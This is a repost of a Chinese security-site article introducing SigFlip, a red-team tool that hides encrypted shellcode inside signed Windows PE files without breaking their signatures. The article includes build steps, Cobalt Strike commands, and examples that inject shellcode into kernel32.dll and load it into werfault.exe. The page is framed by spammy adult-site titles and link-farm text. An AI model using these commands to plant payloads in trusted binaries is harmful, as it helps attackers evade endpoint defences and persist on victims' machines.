成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

如何使用SigFlip篡改身份認證碼簽名的PE文件

安全 數據安全
SigFlip是一款能夠篡改經過身份認證碼簽名的PE文件(exe、dll、sys等)的工具,而且整個過程不會影響或破壞已有的身份認證碼簽名。

[[426526]]

關于SigFlip

SigFlip是一款能夠篡改經過身份認證碼簽名的PE文件(exe、dll、sys等)的工具,而且整個過程不會影響或破壞已有的身份認證碼簽名。換句話來說,就是我們可以使用SigFlip向PE文件中嵌入數據(比如Shellcode),并且再不會破壞文件簽名、完整性檢查或PE文件功能的情況下,修改PE文件的校驗和或哈希。

SigInject組件可以將Shellcode注入至PE文件的[WIN_CERTIFICATE]證書表中,并輸出加密密鑰以便配合BOF/C/C#加載器(SigLoader)一起使用。SigInject將保存針對PE文件的修改操作,并保證其簽名和證書有效性不變。

SigLoader是一個基礎加載器,它采用SigInject創建的修改后的PE文件路徑和解密密鑰作為參數,然后提取和解密嵌入的Shellcode,以供選擇Shellcode注入使用。

SigFlip將檢查PE哈希是否已成功更改,然后退出以繞過終端針對此類行為的檢查。

SigFlip可以用于持久化感染、橫向滲透以及命令/代碼執行等場景。

注意事項:igFlip、SigInject和SigLoader將以BOF腳本和.NET程序集提供。

工具安裝

廣大研究人員可以使用下列命令將該項目源碼克隆至本地:

  1. git clone https://github.com/med0x2e/SigFlip.git 

工具構建/編譯

本項目并沒有提供預編譯的BOF,我們可以使用Mingw-w64來進行編譯。如果是.NET,可以使用VS或csc.exe來編譯.NET項目(SigFlip、SigLoader);如果是BOF,請按照下列步驟操作:

  1. ➜ i686-w64-mingw32-gcc -c sigflip.c -o sigflip.x86.o 
  2.  
  3. ➜ x86_64-w64-mingw32-gcc -c sigflip.c -o sigflip.x64.o 
  4.  
  5. ➜ x86_64-w64-mingw32-gcc -c SigLoader/sigloader.c -o sigloader.x64.o 
  6.  
  7. ➜ i686-w64-mingw32-gcc -c SigLoader/sigloader.c -o sigloader.x86.o 

確保所有的對象文件都存儲在sigflip.cna的相同目錄下,然后在Cobalt Strike中加載sigflip.cna。

注意事項:預編譯的BOF使用的是mingw-64 v8.0.0_3,如果你所使用的mingw-64 >= v9,可能會出現崩潰的情況。

Cobalt Strike

執行程序集:

  1. execute-assembly SigFlip.exe -h 
  2.  
  3. execute-assembly SigLoader -h 

BOF:

當我們在Cobalt Strike中加載sigflip.cna了之后,將會注冊兩個新命令,我們此時就能夠以下列方式使用SigFlip和SigInject了。

  • SigFlip:在不破壞簽名或證書有效性的情況下,修改PE文件哈希:
    1. SigFlip "<PE\_FILE\_PATH>" "<OUTPUT\_PE\_FILE\_PATH (with extension)>
  • SigInject:向PE文件的[WIN_CERTIFICATE]證書表中注入加密的Shellcode,打印的加密密鑰可以跟基礎C/C#加載器結合使用以保證簽名和證書的完整性:
    1. SigInject "<PE\_FILE\_PATH> <OUTPUT\_PE\_FILE\_PATH (with extension)>" "<SHELLCODE\_FILE>
  • SigLoader:從PE文件中加載由SigInject加密的Shellcode,然后使用Early Bird向指定進程注入Shellcode,我們可以自定義Shellcode的注入邏輯,或直接替換目標代碼:
    1. SigLoader <PE_FILE_PATH_WITH_SH> <DECRYPTION_KEY> <SPAWNTO_PROCESS_PATH> <PARENT_PROCESS_ID> 

工具使用樣例

(1) BOF

向msbuild.exe注入隨機數據:

  1. SigFlip "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" "C:\lolbins\modified-msbuild.exe" 

向kernel32.ell注入Shellcode:

  1. SigInject "C:\Windows\System32\kernel32.dll" "C:\random\modified-kernel32.dll" "C:\shellcode\cobaltstrike_or_msf_shellcode.bin" 
  2.  
  3. Sigloader "C:\random\modified-kernel32.dll" "DECRYPTION_KEY" "C:\Windows\System32\werfault.exe" 6300 

(2) 執行程序集

向msbuild.exe注入隨機數據:

  1. execute-assembly SigFlip.exe -b C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe -o C:\Temp\MSBuild.exe 

向kernel32.ell注入Shellcode:

  1. execute-assembly SigFlip.exe -i C:\Windows\System32\kernel32.dll -s C:\Temp\x86shellcode.bin -o C:\Temp\kernel32.dll -e TestSecretKey 
  2.  
  3. execute-assembly SigLoader.exe -f C:\Temp\modified-kernel32.dll -e TestSecretKey -pid 2354 

項目地址

SigFlip:【GitHub傳送門

 

責任編輯:趙寧寧 來源: FreeBuf
相關推薦

2022-07-26 23:45:29

Windows系統蘋果

2022-01-17 09:00:00

漏洞網絡安全身份認證

2021-06-03 09:33:23

PDF漏洞黑客

2023-07-03 08:25:54

2012-11-28 09:55:35

2021-05-11 19:58:01

身份驗證Code

2011-07-28 14:45:07

無線POS機系統

2010-09-03 09:19:13

PPP身份認證

2018-07-05 14:52:05

2011-03-30 13:21:17

2014-04-22 10:15:38

vCenter SSO身份認證

2016-05-17 13:54:05

2013-06-18 19:23:16

身份認證管理身份認證管理系統身份認證

2013-06-19 09:46:57

身份認證管理云應用

2022-02-13 22:42:52

設計模式策略

2010-10-08 21:14:08

2023-12-25 08:04:42

2010-09-06 14:03:06

PPP身份認證

2013-11-15 09:43:02

2012-04-16 09:54:26

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 伊人免费视频二 | 国产极品车模吞精高潮呻吟 | 国产四虎 | av免费成人 | 日韩久久久久 | 国产成人精品一区二区三区四区 | 日韩欧美中文字幕在线观看 | 亚洲欧美网站 | 欧美性生活免费 | 国产中文字幕在线 | 中文字幕乱码视频32 | 超碰婷婷| 国产一区中文字幕 | 国产亚洲一区二区三区 | 福利社午夜影院 | 亚洲一区av在线 | 欧美一二三 | 九色视频网站 | 精品一区久久 | 天天操操操操操 | 欧美aaa级| 久久免费视频2 | 久久看精品 | 国产a级毛片 | 91视频进入 | 一区二区三区中文字幕 | 日韩精品在线看 | 视频第一区 | 欧美日韩亚洲视频 | tube国产 | 色伊人网 | 在线视频中文字幕 | 国产综合视频 | 精品一区二区久久久久久久网站 | 成人超碰在线 | 男女羞羞视频在线 | 亚洲国产精品视频一区 | 日韩在线观看 | www.婷婷亚洲基地 | 中文字幕一区二区三区不卡 | 成人免费在线观看 |